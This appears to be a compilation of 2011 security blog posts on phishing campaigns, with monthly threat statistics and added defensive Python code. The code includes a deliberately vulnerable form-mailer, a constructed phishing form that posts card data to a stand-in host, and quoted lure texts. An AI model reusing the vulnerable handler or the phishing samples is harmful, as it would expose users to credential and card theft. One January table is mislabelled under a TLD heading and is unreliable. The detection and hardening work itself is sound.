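    "ok_url": "http://www.morrisons.co.uk/Offers/",
    "first_name": "A", "last_name": "B",
    "card_number": "4111111111111111", "cvv": "123",
}


def vulnerable_formmail(post):
    """Hypothetical form-mailer with the flaw described above: the client picks
    the recipient, the sender, the field list and the redirect target."""
    msg = EmailMessage()
    msg["To"] = post["submit_to"]
    msg["From"] = post["submit_by"]
    msg["Subject"] = post.get("form_id", "form")
    fields = post["data_order"].split(",")
    msg.set_content("\n".join(f"{f}: {post.get(f, '')}" for f in fields))
    return msg, post.get("ok_url", "/")


# Hardened variant: everything that matters is fixed on the server side.
SITE_HOST = "theburleyinn.co.uk"                 # host this CGI serves
RECIPIENT = "contact@theburleyinn.co.uk"         # assumed mailbox, not from the page
SENDER = "webform@theburleyinn.co.uk"            # assumed envelope sender
ALLOWED_FIELDS = ("name", "email", "message")    # assumed contact-form fields


class RejectedSubmission(Exception):
    pass


def hardened_formmail(post, referer=None):
    """Same job, but no client-controlled value can change the recipient,
    the sender, the field list or the redirect target."""
    # Any attempt to supply routing fields is itself a sign of abuse.
    if "submit_to" in post or "submit_by" in post or "data_order" in post:
        raise RejectedSubmission("client-supplied routing fields")
    unknown = set(post) - set(ALLOWED_FIELDS) - {"ok_url"}
    if unknown:
        raise RejectedSubmission(f"unexpected fields: {sorted(unknown)}")
    # Referer is client-controlled, so this is defence in depth, not authentication.
    if referer is not None and urlparse(referer).hostname != SITE_HOST:
        raise RejectedSubmission("cross-site submission")
    # Redirect only to a path on this site, never to a client-chosen host.
    ok_url = post.get("ok_url", "/thanks.html")
    if urlparse(ok_url).netloc or not ok_url.startswith("/") or ok_url.startswith("//"):
        raise RejectedSubmission("off-site redirect")
    msg = EmailMessage()
    msg["To"] = RECIPIENT
    msg["From"] = SENDER
    msg["Subject"] = "Web form submission"   # fixed text: no header injection from user input
    msg.set_content("\n".join(f"{f}: {post.get(f, '')}" for f in ALLOWED_FIELDS))
    return msg, ok_url


def is_rejected(post, referer=None):
    """True if the hardened handler refuses the submission."""
    try:
        hardened_formmail(post, referer)
    except RejectedSubmission:
        return True
    return False
```

The point of the hardened version is that nothing the client sends can choose who receives the mail or where the browser is sent afterwards; the same-site Referer check is kept only as defence in depth, because the attacker who wrote the phishing form can just as easily omit or forge a Referer.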

Phishing attempts like this, where an HTML page is attached instead of a URL being embedded, are still being used. The main advantage for the attacker is that the email is harder to detect with technologies like Intent Analysis or SURBL, which need a URL in the message body. On the other hand, as a receiver of this kind of phishing email, you should be all the more aware that such emails are not to be trusted: no legitimate company sends you an attachment by email with the request to fill in your credit card details.

[Update March 14th, 2011 - 4:30 PM Local Belgian Time]

We have noticed new phishing emails coming from the spoofed email addresses:

offers@morrissons-discount.com

The attached HTML webform is requesting a CGI on a different server:

hxxp://www.janus-systems.com/cgi-bin/bnbform.cgi.

Posted in Security

Facebook Likejacking, phishing and spam

Last Thursday, I wrote about Facebook Likejacking. Today, similar pages were brought to my attention. They use Likejacking to spread through user profiles using much more aggressive spam techniques.

The pages look like they come from Facebook. The teaser is a video that should be watched "only if you are 16 or older". The play button hides a Facebook Like widget.

Spam page looking like Facebook

Before the user can play the video, he must either verify that he is at least 18, or that he is a human... by filling out surveys, trying games, etc.! The spammers are paid for each action taken by the user (PTC campaign).

“Security check”: the user must fill out a survey

If you stay on these pages long enough, they will attempt to send a form on your behalf. Fortunately, Firefox throws a warning.

Firefox prevents the automatic POST

acidattacker.com shows a Facebook page and a Youtube page with the same content.

Fake Youtube page from spammers

These spam pages can be found at:

  • hxxp://bnltwo.info/video2/
  • hxxp://acidattacker.com/

– Julien

Posted in Facebook

Phishing Scam in an HTML Attachment

In a traditional phishing scam, a phisher usually sets up a website with a fake login form imitating a legitimate online service such as a bank, social networking site, auction site or payment processor. To lure in users, the phisher spams a link to the website through email or instant messaging. Unfortunately for the phishers, modern browsers like Mozilla Firefox and Google Chrome have become quite good at detecting phishing, immediately warning users when a known phishing site is being opened.

Mozilla Firefox and Google Chrome warning users of a phishing site.

Phishers, however, have found a way to circumvent this anti-phishing protection: attaching an HTML file to the spam email. The browser's phishing check is keyed on the URL being navigated to, so when the victim opens a local file there is no HTTP GET request to a phishing site and nothing for the URL blocklist to match. For example, take a look at these spam samples:

Multiple sample of phishing spam campaign with an HTML attachment.

The HTML attachment, stored locally, successfully opens in the browser without the user being warned.

Sample of a phishing HTML form targeting PayPal users. The HTML file is saved in the local directory.

When the victim enters their information and clicks the "Agree and Submit" button, the HTML form sends the stolen information through a POST request to a PHP script hosted on a hacked legitimate web server (in one case, Fritolay.com).

Usually, stolen information is sent to a PHP script on a hacked web server. (Note: we notified Fritolay of the offending PHP file and observed that it has now been removed.)

The phisher's PHP script then redirects the browser to PayPal's homepage after the stolen information has been submitted. Although the POST request sends information to the phisher's remote web server, Google Chrome and Mozilla Firefox did not detect any malicious activity. Months-old phishing campaigns remain undetected, so this tactic seems quite effective. Logically, the browser does see a URL when it sends the POST request, so what makes this type of phishing harder to detect from the browser's perspective? Here are a couple of reasons:

1. Few of the PHP URLs are reported as abuse. Average users cannot report a URL because no phishing URL is visible to them, unless they are technical enough to view the HTML source code.

2. The URLs are hard to verify as phishing sites. The URL alone, without the accompanying HTML form, is hard to confirm as a phish, because the PHP script runs on the server and no visible HTML is displayed after clicking the submit button, other than a redirect to the target brand's homepage.

We have seen an increase in these types of phishing spam campaigns over the last few months. Last month we blogged about a clever phishing campaign targeting Bank of America online users that uses this same phishing tactic. So be wary of HTML attachments included in an email.  If the email seems suspicious, avoid opening the HTML attachment. And if you do happen to open it, be particularly leery of any HTML form requiring you to enter sensitive information.
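The detection gap described above can be closed at the mail gateway by inspecting the attachment itself rather than waiting for a URL to be clicked. The following Python is an added example, not code from this post or from any product mentioned on this page. It parses an HTML attachment, extracts every form's action and hidden fields, and flags forms that post sensitive fields to a host outside the brand the lure claims to be, or that carry an e-mail address in a hidden field (the form-mailer drop-box pattern seen in the HMRC and Morrisons samples earlier on this page). The sample attachment, the host example-compromised-host.invalid and the address dropbox@example.com are constructed for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Substrings that mark a field as sensitive (assumed list; extend to taste).
SENSITIVE_MARKERS = ("card", "cvv", "cvc", "pin", "pass", "sort", "account", "dob", "mmn", "ssn")


class FormCollector(HTMLParser):
    """Collects every <form>, its action/method, its visible inputs and its hidden fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": a.get("method", "get").lower(),
                             "inputs": [], "hidden": {}}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            kind = a.get("type", "text").lower()
            if kind in ("submit", "button", "image", "reset"):
                return
            if kind == "hidden":
                self._current["hidden"][a.get("name", "")] = a.get("value", "")
            else:
                self._current["inputs"].append(a.get("name", ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan_attachment(html, brand_hosts):
    """One finding per form: the host it posts to, whether that host is outside the
    impersonated brand, which sensitive fields it collects, and any e-mail
    addresses hidden in the form. brand_hosts: e.g. {"hmrc.gov.uk"}."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        off_brand = bool(host) and not any(host == b or host.endswith("." + b) for b in brand_hosts)
        sensitive = [n for n in form["inputs"] if any(m in n.lower() for m in SENSITIVE_MARKERS)]
        addresses = [v for v in form["hidden"].values() if "@" in v]
        findings.append({
            "action_host": host,
            "off_brand": off_brand,
            "sensitive_fields": sensitive,
            "hidden_addresses": addresses,
            "verdict": "phish" if (off_brand and sensitive) or addresses else "review",
        })
    return findings


# Constructed stand-in for an attached refund form: branded images, but the
# form posts card data to an unrelated host and names a drop-box address.
SAMPLE_ATTACHMENT = """
<html><body>
<img src="http://www.hmrc.gov.uk/images/logo.gif">
<form action="http://example-compromised-host.invalid/cgi-bin/mailform.cgi" method="post">
  <input type="hidden" name="recipient" value="dropbox@example.com">
  <input type="hidden" name="redirect" value="http://www.hmrc.gov.uk/">
  <input type="text" name="full_name">
  <input type="text" name="card_number">
  <input type="text" name="cvv">
  <input type="submit" value="Submit">
</form>
</body></html>
"""
```

A legitimate HTML attachment with a form posting to the brand's own host, or to a relative path, still comes back as "review" rather than "phish", which is the right default for a gateway: the scanner is there to surface the action host and hidden recipients that the browser's URL check never gets to see.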

Posted in Security

Phishing, Spam and Malware Statistics for February 2011

Most abused TLDs
For the phishing URLs, the upward trend observed in January 2011 continued with even more entries in February. We observe again that more and more different TLDs are used to host phishing, an obvious sign that there are a lot of hacked websites and bots out there. The top of the malware URLs remains almost unchanged, but surprisingly the trend is negative.

Phishing URLs (deviation from January, in %):
#   TLD         %       Deviation
1   .com        51.56   32.44
2   Others      15.82   100.00
3   .org        6.20    21.69
4   .net        5.94    4.42
5   .uk         3.69    37.41
6   IP address  3.22    99.67
7   .br         2.44    -3.66
8   .tk         2.18    7.45
9   .ru         2.01    15.40
10  .tl         1.23    10.21

Malware URLs (deviation from January, in %):
#   TLD         %       Deviation
1   .com        38.35   6.80
2   .info       28.01   93.30
3   Others      8.78    100.00
4   IP address  4.91    99.31
5   .ru         3.94    -7.36
6   .net        3.79    -27.93
7   .org        2.71    -11.32
8   .cc         2.69    25.32
9   .br         1.67    -41.84
10  .uk         1.30    50.00

Spam category statistics
We can only confirm again the trend we observed at the end of 2010: there is in general less spam out there.

Sorted by amount (deviation from January, in %):
#   Category    %       Deviation
1   Other       77.95   -69.35
2   Nigerian    7.50    -1.10
3   Lottery     5.43    -0.29
4   Pharmacy    3.06    -7.71
5   University  1.43    -2.36
6   Software    1.41    -1.86
7   Phishing    1.15    -0.56
8   Loan        0.70    -0.56
9   Malware     0.50    0.22
10  Jobs        0.32    -0.12

Sorted by deviation from January (in %):
#   Category     Deviation
1   Malware      0.22
2   Commercials  0.02
3   Fashion      -0.08
4   Jobs         -0.12
5   Casino       -0.15
6   Lottery      -0.29
7   Phishing     -0.56
8   Loan         -0.56
9   Nigerian     -1.10
10  Watch        -1.73

Extension statistics for malware URLs
This month the .exe extension took the lead by share, on the strength of a 67% increase. The biggest rise, however, belongs to .html (+76%), followed by .htm (+66%). That makes sense considering the storm of updates for all browsers in February, continuing into March: the cyber criminals tried to abuse security vulnerabilities in the web browsers through malicious pages.

Sorted by amount (deviation from January, in %):
#   Extension   %       Deviation
1   exe         42.15   67.44
2   txt         24.93   -15.05
3   none        13.16   -35.62
4   jpg         4.11    -3.73
5   htm         3.70    65.90
6   html        3.53    75.85
7   php         2.37    -31.65
8   rar         1.53    58.89
9   gif         1.26    50.00
10  zip         1.21    -36.62

Sorted by deviation from January (in %):
#   Extension   Deviation
1   html        75.85
2   exe         67.44
3   htm         65.90
4   rar         58.89
5   gif         50.00
6   png         11.54
7   css         0.00
8   com         0.00
9   bat         0.00
10  jpg         -3.73

Most phished brands statistics
The most attacked brand remains PayPal, by a wide margin over the other entries. Below it, the "Others" category has grown: it looks like attacking smaller brands, with potentially more success, is paying off for the phishers.
The biggest ascender this month is HSBC Bank with an 85% increase, which brought it into the top chart (it wasn't present last month).

Sorted by amount (deviation from January, in %):
#   Brand name       %       Deviation
1   PayPal           53.59   55.71
2   Others           20.03   100.00
3   HSBC Bank        5.07    85.20
4   Chase Bank       4.43    64.75
5   Facebook         4.09    26.33
6   eBay             3.48    -402.44
7   Bank of America  3.16    76.25
8   Visa             2.19    46.41
9   Lloyds           2.07    65.50
10  Banco Santander  1.88    50.97

Sorted by deviation from January (in %):
#   Brand name       Deviation
1   Others           100.00
2   HSBC Bank        85.20
3   Bank of America  76.25
4   Lloyds           65.50
5   Chase Bank       64.75
6   PayPal           55.71
7   Banco Santander  50.97
8   Visa             46.41
9   Facebook         26.33
10  eBay             -402.44

URL shorteners used in malicious activities
Tinyurl.com took the lead among the shorteners abused for phishing in February. While bit.ly lost ground in the phishing chart, it gained almost the same amount in the malware area, making it rule that chart with a 22.5-point lead over the next entries.

Phishing (deviation from January, in %):
#   Shortener     %       Deviation
1   tinyurl.com   23.88   10.45
2   tiny.cc       14.93   5.97
3   bit.ly        10.45   -17.91
4   is.gd         5.97    4.48
5   snipurl.com   4.48    4.48
6   ow.ly         4.48    4.48
7   goo.gl        4.48    -4.48
8   doiop.com     4.48    2.99
9   sn.im         2.99    2.99
10  notlong.com   2.99    -2.99

Malware (deviation from January, in %):
#   Shortener     %       Deviation
1   bit.ly        30.00   17.50
2   u.nu          7.50    7.50
3   ow.ly         7.50    5.00
4   tinyurl.com   5.00    0.00
5   tiny.cc       5.00    5.00
6   zi.ma         2.50    2.50
7   tr.im         2.50    2.50
8   snipurl.com   2.50    2.50
9   sn.im         2.50    2.50
10  shorl.com     2.50    2.50

Sorin Mustaca
Data Security Expert

Posted in Avira

Freebox phishing emails

MX Lab, http://www.mxlab.eu, started to intercept a new phishing campaign by email with the subject "Facture N: 01-249576284 !" ("Invoice No: 01-249576284 !"); note that the invoice number changes with each email.

The email is sent from the spoofed address "FreeBox -Internet <service@freebox.fr>" and has the following body (translated from the French original, which also arrived mis-encoded):

Dear Customer,

As a security measure and thanks to our experience, we monitor all unusual charges linked to your account.
We regret to inform you that your freebox account will be limited, because of an unusual movement on your account.

Reference number: BF738492

To remove this limitation please update your personal information concerning your freebox account:

* Click on the following link: Update Your Personal Information.
* Log in
* Update your personal information
* Log in again

You have 48 hours to restore access to your account, otherwise your account will be permanently deleted!

Yours faithfully,

Freebox Service!

The phishing URL is behind the text "Metter à Jour De Votre Information Personnel" ("Update Your Personal Information") and in this case points to hxxp://dedecome.com/. When we visited the site for investigation, the web page in question was not available. But rest assured, this is a phishing attempt.

Posted in Security

Scammers go phishing on Play.com

It always pays to be on your guard, as a phish attempt may crop up in the most unlikely of places.

Sure enough, we have an example of a scammer going phishing on Play(dot)com, the second biggest online retailer in the UK market. Play allows individuals to buy and sell their wares, much like the Amazon marketplace. Here's an example of what I'd see while shopping for Batman DVDs (because really, what else am I going to be wasting my money on?):

Click to Enlarge

Sellers are awarded ratings depending on how awesome they are at selling things – or not. Thanks to MrTom for sending this one over, because what seemed like a bargain videogame purchase resulted in the following email from a seller:

Click to Enlarge

Yes, it's the old "problem with payment" trick so beloved of scammers on sites such as eBay (with random "verified by..." graphics to sweeten the deal). What makes this attempt particularly silly is the following ramble regarding security:

“fill in the following secure form by clicking reply you should then be able to fill in the form. This is just for verfication and a security check  please note we do not see any of your personal details as its encrypted through our server and part of data protection”

There is, of course, no “secure form” – all the victim is doing is sending a regular email to a @live.co.uk account. It’s worth bearing in mind that a copy of said email could well be stored on the servers it passes through, which isn’t really the best thing in the World when you just sent your card details to the Wallet Inspector.

The scammers here are rather lazy, too, hotlinking their images from other sources and causing a little brand damage in the process. You should NEVER send a seller your card details in this manner, especially if they are claiming there are problems and asking for card details via email. Play(dot)com is set up so that you never have to do this, and any other reputable merchant does the same.

Unfortunately these kinds of scams have a chilling effect on new sellers and make it more difficult to get started selling Batman DVDs. And while you will get your money back from the initial transaction made through the Play(dot)com system, you may find it a little more tricky to get results after firing the "Take my money, and take it now" emergency flare in the general direction of an email scammer.

Christopher Boyd

Posted in GFI Software

Dutch phishing for Visa and Mastercard

We have already posted about Visa and Mastercard scams in English. We don't often see a Dutch phishing campaign modelled on a known English one. Usually, Dutch phishing targets the most important banks in the Netherlands, but this one is trying to fool Visa and Mastercard users with the classic "update your credit card data" lure.

A Dutch colleague briefly checked the text of the email and immediately found that it is written in bad Dutch. Even for someone who doesn't speak Dutch at all (like me) it is strange to see that some punctuation seems to be missing, so for a native speaker this is a clear sign of fraud.

The fake website says something about the International Card Services and is clearly copied (including even the tracking code) from the original website and adapted for the phishing attack. However, the fraudsters didn’t even bother to check any of the fields, so if you press Submit, you’re taken to an intermediate website which saves the data (using a form) and then redirects the browser to the real visa.nl website.

Sometimes it is quite funny to see that the fraudsters seem to forget which site they intended to phish. As a reminder: The phishing mail mentions Visa and Mastercard, the fake website mentions ICS (which is related to Visa and Mastercard, but a different website), the intermediary page shows again Visa and Mastercard, and the final website is visa.nl.

Avira users don’t have any reasons to be worried: the URL is blocked and the emails are detected as phishing.

Sorin Mustaca
Data Security Expert

Posted in Avira, Scam

Facebook phishing pages

On 02/13/2011, I found several domains used for Facebook phishing, registered the same day:

  • securedirectsite.com
  • directsecuresite.com
  • securedsitedirect.com
  • highsecuritydirect.com
  • securedsitedirect.com
  • officialsecuredsite.com

These domains contain the same page: a simple form to enter a Facebook login and password.

Facebook Phishing page

After entering the credentials, users are redirected to http://www.facebook.com/pages/Image-hosting-service/106354426063487#!/album.php?profile=1&id=208421665712, which lands the user at their Profile Pictures page. If the user was not yet logged into Facebook, he must log in "again". The phishing page does not post the credentials to Facebook on the user's behalf.

Fast-flux DNS

All of the domains were registered by the same individual in China.

WHOIS information for highsecuritydirect.com

The domains are bound to multiple IP addresses that change rapidly (aka fast-flux DNS):

DNS information for highsecuritydirect.com

They all use the DNS server fbnameserver.com, which has been used for other Facebook phishing sites in the past.
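A simple way to back up the fast-flux observation above is to resolve the name repeatedly and look at how many distinct addresses and /24 networks it cycles through, and at the answer TTL. The Python below is an added example, not from this post: the DNS answers are constructed from documentation address ranges rather than captured from the domains listed, and the thresholds are assumptions a practitioner would tune against their own baseline.

```python
from ipaddress import ip_network

# Constructed answers for one hostname: (seconds since first query, TTL, A records).
# Addresses are from documentation ranges, not from the domains listed above.
FLUX_ANSWERS = [
    (0,    300, ["203.0.113.10", "198.51.100.7", "192.0.2.44", "203.0.113.200"]),
    (600,  300, ["198.51.100.90", "192.0.2.9", "203.0.113.10", "198.51.100.7"]),
    (1200, 300, ["192.0.2.130", "203.0.113.77", "198.51.100.21", "192.0.2.44"]),
]
STABLE_ANSWERS = [
    (0,    3600, ["192.0.2.1", "192.0.2.2"]),
    (600,  3600, ["192.0.2.1", "192.0.2.2"]),
    (1200, 3600, ["192.0.2.2", "192.0.2.1"]),
]


def flux_metrics(answers):
    """Summarise how much a name's A records move between successive answers."""
    seen = set()
    previous = None
    newcomers = 0           # addresses absent from the immediately preceding answer
    for _, _, records in answers:
        current = set(records)
        if previous is not None:
            newcomers += len(current - previous)
        previous = current
        seen |= current
    # /24 diversity: flux networks spread across many unrelated access networks.
    networks = {str(ip_network(f"{ip}/24", strict=False)) for ip in seen}
    return {
        "unique_ips": len(seen),
        "unique_24s": len(networks),
        "min_ttl": min(ttl for _, ttl, _ in answers),
        "new_ips_per_answer": newcomers / max(len(answers) - 1, 1),
    }


def looks_fast_flux(answers, max_ttl=600, min_ips=6, min_24s=3, min_churn=1.0):
    """Heuristic: short TTL plus many addresses spread over several networks
    that keep changing between answers. Thresholds are assumptions to tune."""
    m = flux_metrics(answers)
    return (m["min_ttl"] <= max_ttl and m["unique_ips"] >= min_ips
            and m["unique_24s"] >= min_24s and m["new_ips_per_answer"] >= min_churn)
```

Content delivery networks also rotate many addresses with short TTLs, so a hit from this heuristic is a reason to look at the hosting ASNs, the name server and the registrant, not a verdict on its own.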

Random redirections

On 02/14/2011, these 6 domains were redirecting users to http://www.google.com/ in the morning. In the afternoon, they redirected users to http://www.facebook.com/. Since 02/16/2011, they seem to display the phishing pages all the time. I'm not sure why these redirections were set up earlier.

These domains are not yet blocked by Google Safe Browsing.

– Julien

Posted in Facebook, Scam

Back to School; Time to Go Phishing

As university students prepare to go back to their studies this year, their email accounts and personal information are ripe for the picking.

Today we observed phishing emails being sent to tertiary students, warning that their passwords have expired or, in a separate email, that their password will expire within 2 weeks. Both of these emails provide a convenient link to a website that promises to remedy the situation.

The link in the above message points to hxxp://[redacted].cz.cc. The cz.cc domain is a free hosting service that the phishers are using to host their forms.

The link in this message is for the URL shortening service tinylink.ca, which redirects to another URL shortening service, cach.us, which in turn redirects the user to the phishing site. The phishing page this message directs users to appears to be on a hacked web server.

It seems that university students aren't the only target of this phisher. Closer investigation revealed a more ambitious scam artist than usual, running 5 different phishing forms on the same domain. These were pages for Verizon, credit card details, university students, and two unidentified targets. All of these pages had the same generic form for victims to enter their details into, with no logos or official branding present except for an image in the footer with the text "Powered By php Form Generator". This is an open source project aimed at making it simple for end users to create forms and manage the data people enter into them. Because they were generated in the same way, all the forms had a very similar look, as can be seen in the two below.

The administration pages for each of the 5 phishing forms were also freely available after a bit of digging, and this is what was found on the admin page corresponding to the scam targeting members of educational institutions (note each email address ending in .edu):

As seen here, there were plenty of people who were willing to give their full name and email address, along with a username and password for accessing the account.

The administration pages for the other concurrent scams being run from this site weren't quite as busy, with a maximum of 3 entries seen in any of them at once. That, however, isn't to say that more activity was not happening on them.

Whatever the case, this is a very basic scam pulled off by a person with probably little knowledge of the systems they were setting up. This was seen in the ease of accessing the admin pages, which required no username or password to view the admin console and interact with it. All the fraudster required to create the pages was free hosting and the pre-made wizard for creating the forms (also bundled with the pre-made administration portal). Despite the technical simplicity, there are obviously still users out there who are willing to hand over real information about themselves to even unconvincing cyber con-artists.

Remember the tried and true advice: don't follow links from emails which ask for your personal details. Even if it looks like it could be real, treat unsolicited requests for personal information online as if someone came up to you on the street asking the same questions. Verify first that people are who they claim to be before you decide how much trust to put in them.

Posted in Security

PayPal phishing email

A wave of PayPal phishing emails

Over 200 million people have accounts on PayPal, making it a key target for internet fraudsters attempting to steal money.

One of the ways that criminals try to get their hands on your cash is by phishing for your PayPal account details.

An aggressive campaign that we have seen widely spammed out in the last few hours does precisely that, pretending to be a security warning from PayPal.

PayPal phishing email

From: "PayPal" <tax@ato.gov.au>

Subject: Please confirm your identity

Attached file: update-account.html

Message body:
When you will complete the document we have sent, remember to ALLOW javascript and ActiveX to run from the bar that will pop-up, otherwise we cannot verify the informations you have provided.

February 22, 2011:Valued PayPaI Member, We have reasons to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection.

OPEN AND COMPLETE THE FORM ATTACHED IN THIS MESSAGE TO REGAIN ACCESS TO YOUR ACCOUNT.

Thank you for your time and understanding, PayPal Resolution Center.

Clicking on the HTML attachment will open your web browser, and might trick you into believing that you are on the genuine PayPal web page.

Attached file steals PayPal information

However, this attack's intention is to trick you into handing over your credit card details, full date of birth, name and address.

If you're ever uncertain whether a message really comes from PayPal or not, visit the real PayPal website and log in as usual. If they really have a security message for you, you'll be able to read it via the PayPal messaging system itself.

Sophos products intercept the emails being used in this latest phishing campaign, ensuring that customers are protected.

Posted in Sophos

    Phishing, Spam and Malware Statistics for January 2011

    A little late this time, but here are our statistics about the phishing, spam and malware situation in January 2011!

    Most abused TLDs

    While the numbers for Phishing in December were almost all red, showing a dramatic drop for the .org (-151%), .com(-76%) and .net(-24%) domains, we now have seen the exact opposite development in January 2011. Phishing was definitely on the rise and even if the malware URLs still show mostly as red numbers, some of them have also increased. However, even with these high fluctuations, the top 10 remains practically unchanged from December 2010.

    Sorted by amount Sorted by deviation
    # Brand name % Deviation from
    December
    in %
    # Brand name Deviation from
    December
    in %
    1 Paypal 36.84 52.68 1 Others 100.00
    2 Ebay 27.12 92.65 2 Yahoo 97.28
    3 Others 19.18 100.00 3 Ebay 92.65
    4 Facebook 4.68 63.05 4 Banco Santander 69.74
    5 Yahoo 3.46 97.28 5 Facebook 63.05
    6 Chase Bank 2.43 38.76 6 Commonwealth Bank 62.92
    7 Visa 1.82 4.12 7 Paypal 52.68
    8 Commonwealth Bank 1.67 62.92 8 Chase Bank 38.76
    9 Banco Santander 1.43 69.74 9 World of Warcraft 11.11
    10 World of Warcraft 1.35 11.11 10 Visa 4.12

    Spam category statistics

    The trend we observed in December 2010 (overall less spam) continued in January for all categories. Here also the top 10 remains unchanged in comparison with December.

    Sorted by amount Sorted by deviation
    # Category % Deviation from
    December
    in %
    # Category Deviation from
    December
    in %
    1 Other 79.35 -12.51 1 Jobs 0.09
    2 Pharmacy 5.80 -1.71 2 Loan 0.07
    3 Nigerian 4.64 -0.32 3 Commercials 0.02
    4 Lottery 3.08 -0.38 4 Fashion 0.01
    5 University 2.04 -2.38 5 Casino -0.03
    6 Software 1.76 -0.77 6 Malware -0.07
    7 Watch 1.02 -0.48 7 Phishing -0.19
    8 Phishing 0.93 -0.19 8 Nigerian -0.32
    9 Loan 0.68 0.07 9 Lottery -0.38
    10 Casino 0.25 -0.03 10 Watch -0.48

    Extension statistics for malware URLs

    The malicious files extensions top chart shows a descending trend, following the trend of the overall malware URLs. A newcomer in the top 10 is the extension OCX. The OCX file type is associated with ‘Object Linking and Embedding (OLE) Control Extension’ by Microsoft. These files can become infected and it are quite hard to detect as they are usually loaded by other modules. The big “looser” of this month is the HTML/HTM extension. Obviously, the cyber criminals have found better ways to spread malware than through a page which usually drops some malware on the user’s computer.

    Sorted by amount Sorted by deviation
    # Extension % Deviation from
    December
    in %
    # Extension Deviation from
    December
    in %
    1 txt 38.03 -8.91 1 ocx 100.00
    2 none 23.64 -146.90 2 zip 69.07
    3 exe 18.18 -115.78 3 rar 62.16
    4 jpg 5.65 -156.40 4 cmd 50.00
    5 php 4.13 -397.81 5 pdf 29.03
    6 zip 2.19 69.07 6 bat 0.00
    7 htm 1.67 -1001.35 7 txt -8.91
    8 pdf 1.40 29.03 8 png -17.39
    9 html 1.13 -1224.00 9 exe -115.78
    10 rar 0.84 62.16 10 none -146.90

    Most phished brands statistics

    The most attacked brands differ only slightly from December. While Paypal lost a lot of its intensity in December, we’ve seen a comeback in the form of a 52% increase in January. However, the biggest gain of this month is Ebay with a 92% increase, which lands it in second place with 27% of the total amount of phished brands.

    Sorted by amount
    #    Brand name          %       Deviation from December in %
    1    Paypal              36.84    52.68
    2    Ebay                27.12    92.65
    3    Others              19.18   100.00
    4    Facebook             4.68    63.05
    5    Yahoo                3.46    97.28
    6    Chase Bank           2.43    38.76
    7    Visa                 1.82     4.12
    8    Commonwealth Bank    1.67    62.92
    9    Banco Santander      1.43    69.74
    10   World of Warcraft    1.35    11.11

    Sorted by deviation
    #    Brand name          Deviation from December in %
    1    Others              100.00
    2    Yahoo                97.28
    3    Ebay                 92.65
    4    Banco Santander      69.74
    5    Facebook             63.05
    6    Commonwealth Bank    62.92
    7    Paypal               52.68
    8    Chase Bank           38.76
    9    World of Warcraft    11.11
    10   Visa                  4.12

    URL Shorteners used in malicious activities

    The URL shorteners, too, show only positive numbers in January. We have seen small fluctuations within the top 10, but nothing dramatic. For the first time since we started this analysis, the most abused services in both categories are bit.ly and tinyurl.com.

    Phishing
    #    Shortener      %       Deviation from December in %
    1    bit.ly         28.57   17.14
    2    tinyurl.com    14.29   12.86
    3    goo.gl         11.43    5.71
    4    tiny.cc        10.00    7.14
    5    notlong.com     7.14    2.86
    6    is.gd           2.86    2.86
    7    doiop.com       2.86    1.43
    8    zi.ma           1.43    1.43
    9    u.nu            1.43    1.43
    10   tr.im           1.43    1.43

    Malware
    #    Shortener      %       Deviation from December in %
    1    bit.ly         18.18   15.15
    2    tinyurl.com     9.09    9.09
    3    notlong.com     9.09    9.09
    4    ow.ly           6.06    6.06
    5    zi.ma           3.03    3.03
    6    u.nu            3.03    3.03
    7    tr.im           3.03    3.03
    8    tiny.cc         3.03    0.00
    9    snipurl.com     3.03    3.03
    10   sn.im           3.03    3.03
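    As an added example (not code from the Avira report), the following Python reproduces the two kinds of share statistics tabulated above, the file extension of malware URLs (including the report's own "none" bucket) and the shortener host, over a constructed list of placeholder URLs. The deviation formula is an assumption inferred from the tables (newcomers such as ocx and Others score exactly 100.00, an unchanged bucket such as bat scores 0.00); the report does not state how it is computed.

```python
from collections import Counter
from posixpath import splitext
from urllib.parse import urlsplit

# Shortener domains taken from the report's two top-10 lists.
SHORTENERS = {"bit.ly", "tinyurl.com", "goo.gl", "tiny.cc", "notlong.com",
              "is.gd", "doiop.com", "zi.ma", "u.nu", "tr.im", "ow.ly",
              "snipurl.com", "sn.im"}

# Constructed sample of malware URLs (placeholder hosts, not real indicators).
SAMPLE_URLS = [
    "http://example.invalid/update/setup.exe",
    "http://example.invalid/load.php?id=1",
    "http://example.invalid/docs/invoice.PDF",
    "http://example.invalid/",
    "http://example.invalid/promo",
    "http://bit.ly/xyz1",
    "http://bit.ly/xyz2",
    "http://tinyurl.com/abc",
    "http://example.invalid/ctl/widget.ocx",
    "http://example.invalid/readme.txt#top",
]

def url_extension(url):
    """Lower-cased extension of the URL path, or 'none' when there is none
    (the report's own 'none' bucket); query string and fragment are ignored."""
    ext = splitext(urlsplit(url).path)[1]
    return ext[1:].lower() if ext else "none"

def shortener(url):
    """Shortener host of the URL, or None when the host is not a known shortener."""
    host = (urlsplit(url).hostname or "").lower()
    return host if host in SHORTENERS else None

def share_table(urls, key):
    """Percentage share per bucket, most common first, rounded like the report."""
    buckets = Counter(k for k in map(key, urls) if k is not None)
    total = sum(buckets.values())
    return [(k, round(100.0 * v / total, 2)) for k, v in buckets.most_common()]

def deviation(current, previous):
    """'Deviation from December in %'. Assumption: relative to the current value,
    since newcomers (ocx, Others) score exactly 100.00 and an unchanged bucket
    (bat) scores 0.00; the report itself does not state the formula."""
    return round(100.0 * (current - previous) / current, 2)

if __name__ == "__main__":
    print(share_table(SAMPLE_URLS, url_extension))
    print(share_table(SAMPLE_URLS, shortener))
```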

    Sorin Mustaca
    Data Security Expert

    Posted in Avira


    So it’s a scam AND phishing attempt

    Our previous post about malicious links being spammed out on Facebook said that the links were phishing attempts. Well, turns out it’s also a spyware scam.

    So the links we saw being sent around led to a fake Facebook log-in page:

    Looks like a plain vanilla phishing attempt so far. However, further testing with a dummy account showed that something a bit more interesting is going on.

    If you enter your account details into the supposed log-in page, you’re directed to this enticing notice:

    Who doesn’t want a free iPad, right? If you then click on the ‘Claim Now’ buttons for any of the oh-so-lovely prizes, you then get taken to this site:

